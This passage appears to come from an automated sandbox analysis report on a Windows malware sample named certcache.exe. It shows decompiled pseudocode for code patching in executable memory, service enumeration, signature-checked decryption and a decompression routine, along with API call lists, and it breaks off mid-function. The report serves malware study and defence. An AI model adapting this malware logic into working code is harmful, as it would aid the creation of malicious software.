    					E00139370(_t13, _t14, _t15, _t16); // executed
    					_t7 = L001390B0(__eflags); // executed
    					return _t7;
    				} else {
    					_t8 = _t17 - 0x208;
    					if( *(_t17 - 0x208) != 0) {
    						while( *_t8 != 0x5c) {
    							_t8 = _t8 + 2;
    							_t25 =  *_t8;
    							if( *_t8 != 0) {
    								continue;
    							} else {
    								E00139370(_t13, _t14, _t15, _t16);
    								return L001390B0(_t25);
    							}
    							goto L9;
    						}
    						goto 0x141962;
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("int3");
    						asm("lahf");
    						asm("int3");
    						asm("int3");
    						 *(_t8 + 2) = _t13;
    						GetVolumeInformationW(_t17 - 0x208, _t13, ??, ??, ??, ??, ??, ??); // executed
    					}
    					goto L8;
    				}
    				L9:
    			}

    APIs
    • GetWindowsDirectoryW.KERNEL32 ref: 00139305
      • Part of subcall function 00139370: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\certcache.exe,00000104), ref: 0013938C
      • Part of subcall function 00139370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00139398
      • Part of subcall function 00139370: CloseServiceHandle.SECHOST(00000000), ref: 001393AA
      • Part of subcall function 00139370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001393C6
      • Part of subcall function 00139370: RtlAllocateHeap.NTDLL(00000000), ref: 001393CD
      • Part of subcall function 00139370: lstrlen.KERNEL32(?), ref: 001393F4
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • GetVolumeInformationW.KERNELBASE(?), ref: 00139355
      • Part of subcall function 00139370: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\certcache.exe,00000104), ref: 0013938C
      • Part of subcall function 00139370: OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00139398
      • Part of subcall function 00139370: CloseServiceHandle.SECHOST(00000000), ref: 001393AA
      • Part of subcall function 00139370: GetProcessHeap.KERNEL32(00000008,0000015C), ref: 001393C6
      • Part of subcall function 00139370: RtlAllocateHeap.NTDLL(00000000), ref: 001393CD
      • Part of subcall function 00139370: lstrlen.KERNEL32(?), ref: 001393F4
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 30%
    			E001223F0(intOrPtr _a4, void* _a8) {
    				char _v21;
    				char _v26;
    				char _v31;
    				intOrPtr* _v36;
    				intOrPtr _v40;
    				intOrPtr* _v44;
    				intOrPtr* _v48;
    				void** _v52;
    				char* _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr* _v72;
    				intOrPtr* _v76;
    				intOrPtr* _v80;
    				void** _v84;
    				char* _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				char* _v100;
    				intOrPtr _v104;
    				signed int _v108;
    				signed int _v112;
    				intOrPtr _v116;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				intOrPtr _v132;
    				intOrPtr _v136;
    				intOrPtr _v140;
    				intOrPtr _v144;
    				intOrPtr _v148;
    				intOrPtr _v152;
    				intOrPtr _v156;
    				intOrPtr _v160;
    				intOrPtr _v164;
    				void* _t121;
    				intOrPtr _t143;
    				intOrPtr _t148;
    				intOrPtr _t157;
    				intOrPtr _t158;
    				void* _t162;
    				intOrPtr _t164;
    				intOrPtr _t167;
    				char* _t168;
    				void** _t173;
    				void* _t178;
    				intOrPtr _t191;
    				intOrPtr _t197;
    				intOrPtr _t214;
    				intOrPtr _t217;
    				intOrPtr* _t223;
    				void** _t232;
    				char* _t234;
    				void* _t243;
    				intOrPtr* _t244;
    
    				_v36 =  &_v21;
    				_v40 = _a4;
    				_v44 =  &_v31;
    				_v48 =  &_v26;
    				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
    				_t234 =  &_v21;
    				_t168 =  &_v26;
    				_v52 = _t121;
    				_v56 =  &_v31;
    				 *_v52 = 0;
    				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
    				_v64 = 4;
    				_v68 = _v40 + _v60;
    				_t130 =  ==  ? _v68 : 0;
    				_v72 = _v56 + 1;
    				_v76 = _t168 + 1;
    				_v80 = _t234 + 1;
    				_v84 =  &(_v52[1]);
    				_v88 = _t168;
    				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
    				_v96 = _v64;
    				_v100 = _t234;
    				_v104 = 0xfffffffb - _v52;
    				_v108 = 0;
    				while(1) {
    					_t191 = _v96;
    					_v112 = _v108;
    					_v116 = _t191;
    					_t143 = _t191 + _v52;
    					 *_v56 = 0xe8;
    					 *_v72 = 0x122194 - _t143;
    					_t173 = _v52;
    					_v120 = _t143;
    					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
    					_t197 = _v116;
    					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
    					_t148 =  *((intOrPtr*)(0x12305c + _v112 * 0xc + 4));
    					_v124 = _t148;
    					_t178 = _t148 + _v40;
    					 *_v88 = 0xe9;
    					_v128 = _v120 + 0xfffffffb - _t178;
    					_v132 = _t197 + 5;
    					 *_v76 = _v128;
    					 *_v100 = 0xe9;
    					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
    					_v136 =  *((intOrPtr*)(0x12305c + _v112 * 0xc + 8));
    					_v140 =  *((intOrPtr*)(0x12305c + _v112 * 0xc));
    					_v144 = _v52 + _v132;
    					_v148 = 0;
    					do {
    						_t157 = _v148;
    						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
    						_t158 = _t157 + 1;
    						_v148 = _t158;
    					} while (_t158 != _v136);
    					_t244 = _t243 - 0x14;
    					 *_t244 = _v40;
    					_v164 = _v92;
    					_v160 = _v124;
    					_v156 = _v136;
    					_v152 = _v144;
    					E001221AC();
    					_t243 = _t244 + 0x14;
    					_t162 = _v116 + _v136;
    					_t223 = _v36;
    					_t232 = _v84;
    					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
    					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
    					_t164 = _v40;
    					_t214 = _v124;
    					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
    					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
    					_t167 = _v116 + 0xe + _v136;
    					_t217 = _v112 + 1;
    					_v96 = _t167;
    					_v108 = _t217;
    					if(_t217 != 0x160) {
    						continue;
    					}
    					return _t167;
    				}
    			}

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00122428
    Memory Dump Source
    • Source File: 00000004.00000002.729839637.0000000000120000.00000040.sdmp, Offset: 00120000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_120000_certcache.jbxd

    Non-executed Functions

    APIs
    • RtlAllocateHeap.NTDLL ref: 001325A4
    • CryptDuplicateHash.ADVAPI32(00000000,00000000,?), ref: 001325CA
    • memcpy.NTDLL(?,?), ref: 001325DE
    • CryptDecrypt.ADVAPI32(?,00000001,00000000,?,?), ref: 001325FA
    • CryptVerifySignatureW.ADVAPI32(?,?,00000060,00000000,00000000,?,?), ref: 00132616
    • CryptDestroyHash.ADVAPI32(?,?,?), ref: 00132629
    • GetProcessHeap.KERNEL32(00000000), ref: 0013263C
    • HeapFree.KERNEL32(00000000), ref: 00132643
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 37%
    			E00132505(void* __eax, void* __ebx, void* __edi) {
    				void* _t18;
    				void** _t20;
    				void* _t22;
    
    				 *((intOrPtr*)(_t22 - 0x14)) = 0x14;
    				 *0x13c068( *((intOrPtr*)(_t22 - 4)), 2, __ebx + 0x60, __eax);
    				_t18 =  !=  ? 1 : __edi;
    				_t20 =  *(_t22 + 8);
    				 *0x13c048( *((intOrPtr*)(_t22 - 4)));
    				if(_t18 == 0) {
    					HeapFree(GetProcessHeap(), 0,  *_t20);
    					 *_t20 = 0;
    					_t20[1] = 0;
    				}
    				return _t18;
    			}

    APIs
    • CryptGetHashParam.ADVAPI32(?,00000002,?), ref: 00132516
    • CryptDestroyHash.ADVAPI32(?,?,?,?), ref: 0013252C
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?), ref: 0013253A
    • HeapFree.KERNEL32(00000000), ref: 00132541
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • EnumServicesStatusExW.ADVAPI32 ref: 0013985F
    • OpenServiceW.ADVAPI32(?,?,00000001), ref: 0013989D
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    APIs
    • EnumServicesStatusExW.ADVAPI32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 0013980A
    • GetLastError.KERNEL32(?,00000000,00000030,00000003,00000000,00000000,?), ref: 00139818
    • CloseServiceHandle.ADVAPI32 ref: 0013996E
    Memory Dump Source
    • Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true
    • Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
    • Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
    • Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_130000_certcache.jbxd
    C-Code - Quality: 50%
    			E00132E6A(void* __ebx, void* __fp0) {
    				signed int _t1688;
    				signed int _t1692;
    				void* _t2075;
    				signed int _t2086;
    				signed int _t2465;
    				void* _t2870;
    
    				_t2075 = __ebx;
    				 *(_t2870 - 0x1c) = 0xffffffff;
    				 *(_t2870 - 4) =  *(_t2870 + 0xc);
    				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
    				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
    				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
    				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
    					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
    				} else {
    					 *(_t2870 - 0xf0) = 0xffffffff;
    				}
    				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
    				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
    					 *( *(_t2870 + 0x1c)) = 0;
    					 *( *(_t2870 + 0x10)) = 0;
    					_t1688 = 0xfffffffd;
    				} else {
    					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
    					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
    					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
    					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
    					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
    					_t1692 =  *( *(_t2870 + 8) + 0x3c);
    					 *(_t2870 - 0x7c) = _t1692;
    					_t2086 =  *(_t2870 + 8);
    					_t2465 =  *_t2086;
    					 *(_t2870 - 0xf8) = _t2465;
    					if( *(_t2870 - 0xf8) <= 0x35) {
    						_t50 =  *(_t2870 - 0xf8) + 0x1355b0; // 0xcccccc20
    						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M00135528))) {
    							case 0:
    								 *( *(_t2870 + 8) + 0xc) = 0;
    								 *( *(_t2870 + 8) + 8) = 0;
    								 *(_t2870 - 0x24) = 0;
    								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
    								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
    								 *(_t2870 - 8) =  *(_t2870 - 0x28);
    								 *(_t2870 - 0xc) =  *(_t2870 - 8);
    								 *( *(_t2870 + 8) + 0x1c) = 1;
    								 *( *(_t2870 + 8) + 0x10) = 1;
    								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
    									goto L48;
    								} else {
    									goto L9;
    								}
    								goto L600;
    							case 1:
    								if(0 != 0) {
    									L11:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 1;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L10;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L18:
    										L20:
    										if(0 != 0) {
    											L9:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L20;
    											} else {
    												L10:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 8) = 0;
    													goto L18;
    												} else {
    													goto L11;
    												}
    											}
    										} else {
    											goto L21;
    										}
    									}
    								}
    								goto L600;
    							case 2:
    								if(0 != 0) {
    									L23:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 2;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L22;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L30:
    										L32:
    										if(0 != 0) {
    											L21:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L32;
    											} else {
    												L22:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 0xc) = 0;
    													goto L30;
    												} else {
    													goto L23;
    												}
    											}
    										} else {
    											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
    												 *(_t2870 - 0x110) = 1;
    											} else {
    												 *(_t2870 - 0x110) = 0;
    											}
    											_t1692 =  *(_t2870 - 0x110);
    											 *(_t2870 - 0x10) = _t1692;
    											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
    											if(_t2086 == 0) {
    												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    												if(1 > 0x8000) {
    													L42:
    													 *(_t2870 - 0x10c) = 1;
    												} else {
    													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    													if( *(_t2870 - 0x88) + 1 < 1) {
    														goto L42;
    													} else {
    														 *(_t2870 - 0x10c) = 0;
    													}
    												}
    												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
    												 *(_t2870 - 0x10) = _t2086;
    											}
    											if( *(_t2870 - 0x10) == 0) {
    												goto L48;
    											} else {
    												goto L45;
    											}
    										}
    									}
    								}
    								goto L600;
    							case 3:
    								if(0 != 0) {
    									goto L51;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L50;
    									} else {
    										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L58;
    									}
    								}
    								goto L600;
    							case 4:
    								if(0 != 0) {
    									goto L67;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L66;
    									} else {
    										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L74;
    									}
    								}
    								goto L600;
    							case 5:
    								if(0 != 0) {
    									goto L86;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L85;
    									} else {
    										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L93;
    									}
    								}
    								goto L600;
    							case 6:
    								if(0 != 0) {
    									goto L101;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L100;
    									} else {
    										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L108;
    									}
    								}
    								goto L600;
    							case 7:
    								if(0 != 0) {
    									goto L141;
    								} else {
    									goto L140;
    								}
    								goto L600;
    							case 8:
    								if(0 == 0) {
    								}
    								goto L165;
    							case 9:
    								if(0 != 0) {
    									goto L193;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L192;
    									} else {
    										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L200;
    									}
    								}
    								goto L600;
    							case 0xa:
    								if(0 != 0) {
    									goto L215;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L214;
    									} else {
    										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L222;
    									}
    								}
    								goto L600;
    							case 0xb:
    								if(0 != 0) {
    									goto L293;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L292;
    									} else {
    										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L300;
    									}
    								}
    								goto L600;
    							case 0xc:
    								if(0 == 0) {
    								}
    								goto L318;
    							case 0xd:
    								if(0 != 0) {
    									goto L325;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L324;
    									} else {
    										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L332;
    									}
    								}
    								goto L600;
    							case 0xe:
    								if(0 == 0) {
    								}
    								goto L344;
    							case 0xf:
    								if(0 != 0) {
    									goto L367;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L366;
    									} else {
    										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L374;
    									}
    								}
    								goto L600;
    							case 0x10:
    								if(0 != 0) {
    									goto L390;
    								} else {
    									goto L389;
    								}
    								goto L600;
    							case 0x11:
    								if(0 != 0) {
    									goto L424;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L423;
    									} else {
    										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L431;
    									}
    								}
    								goto L600;
    							case 0x12:
    								if(0 != 0) {
    									goto L454;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L453;
    									} else {
    										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L461;
    									}
    								}
    								goto L600;
    							case 0x13:
    								if(0 != 0) {
    									goto L479;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L478;
    									} else {
    										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L486;
    									}
    								}
    								goto L600;
    							case 0x14:
    								if(0 != 0) {
    									goto L536;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L535;
    									} else {
    										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L543;
    									}
    								}
    								goto L600;
    							case 0x15:
    								if(0 == 0) {
    								}
    								goto L581;
    							case 0x16:
    								if(0 == 0) {
    								}
    								goto L244;
    							case 0x17:
    								if(0 == 0) {
    								}
    								L45:
    								 *(_t2870 - 0x1c) = 0xffffffff;
    								_t2465 =  *(_t2870 + 8);
    								 *_t2465 = 0x24;
    								goto L600;
    							case 0x18:
    								if(0 == 0) {
    								}
    								goto L495;
    							case 0x19:
    								if(0 != 0) {
    									goto L146;
    								} else {
    									goto L144;
    								}
    								goto L600;
    							case 0x1a:
    								if(0 == 0) {
    								}
    								goto L114;
    							case 0x1b:
    								if(0 == 0) {
    								}
    								goto L149;
    							case 0x1c:
    								if(0 != 0) {
    									goto L555;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L554;
    									} else {
    										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L562;
    									}
    								}
    								goto L600;
    							case 0x1d:
    								if(0 != 0) {
    									goto L570;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L569;
    									} else {
    										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L577;
    									}
    								}
    								goto L600;
    							case 0x1e:
    								if(0 != 0) {
    									goto L122;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L121;
    									} else {
    										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L129;
    									}
    								}
    								goto L600;
    							case 0x1f:
    								if(0 != 0) {
    									goto L135;
    								} else {
    									goto L134;
    								}
    								goto L600;
    							case 0x20:
    								if(0 != 0) {
    									L504:
    									 *(_t2870 - 0x1c) = 2;
    									_t1692 =  *(_t2870 + 8);
    									 *_t1692 = 0x35;
    								} else {
    									L503:
    									_t2465 =  *(_t2870 - 0x14);
    									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
    										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
    										L502:
    										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
    										_t2086 =  *(_t2870 - 0x10) - 1;
    										 *(_t2870 - 0x10) = _t2086;
    										if( *(_t2870 - 0x118) == 0) {
    											L350:
    											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    											if(_t1747 < 4) {
    												L352:
    												if( *(_t2870 - 8) >= 0xf) {
    													L381:
    													goto 0x140bac;
    													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    													 *(_t2870 - 0x3c) = _t2519;
    													if( *(_t2870 - 0x3c) < 0) {
    														 *(_t2870 - 0x50) = 0xa;
    														do {
    															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
    															_t2519 =  *(_t2870 - 0x50) + 1;
    															 *(_t2870 - 0x50) = _t2519;
    														} while ( *(_t2870 - 0x3c) < 0);
    													} else {
    														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
    														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
    													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
    													 *(_t2870 - 8) = _t1747;
    													_t2086 = 0;
    													if(0 != 0) {
    														goto L352;
    													} else {
    														if( *(_t2870 - 0x10) < 0x100) {
    															L389:
    															_t2465 =  *(_t2870 - 0x14);
    															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    																_t2086 =  *(_t2870 - 0x14) + 1;
    																 *(_t2870 - 0x14) = _t2086;
    																goto L417;
    															} else {
    																L390:
    																 *(_t2870 - 0x1c) = 2;
    																_t1692 =  *(_t2870 + 8);
    																 *_t1692 = 0x18;
    															}
    														} else {
    															goto L418;
    														}
    													}
    												} else {
    													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														goto L381;
    													} else {
    														L354:
    														goto 0x140b73;
    														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    														 *(_t2870 - 0x3c) = _t2534;
    														if( *(_t2870 - 0x3c) < 0) {
    															if( *(_t2870 - 8) <= 0xa) {
    																goto L365;
    															} else {
    																 *(_t2870 - 0x50) = 0xa;
    																while(1) {
    																	goto 0x140b86;
    																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
    																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
    																	_t2534 =  *(_t2870 - 0x50) + 1;
    																	 *(_t2870 - 0x50) = _t2534;
    																	if( *(_t2870 - 0x3c) >= 0) {
    																		break;
    																	}
    																	_t1747 =  *(_t2870 - 0x50) + 1;
    																	if( *(_t2870 - 8) >= _t1747) {
    																		continue;
    																	}
    																	break;
    																}
    																if( *(_t2870 - 0x3c) < 0) {
    																	goto L365;
    																} else {
    																	goto L378;
    																}
    															}
    														} else {
    															_t1747 =  *(_t2870 - 0x3c) >> 9;
    															 *(_t2870 - 0x50) = _t1747;
    															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
    																L365:
    																_t2086 =  *(_t2870 - 4);
    																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																	goto L376;
    																} else {
    																	L366:
    																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																	if(_t2465 == 0) {
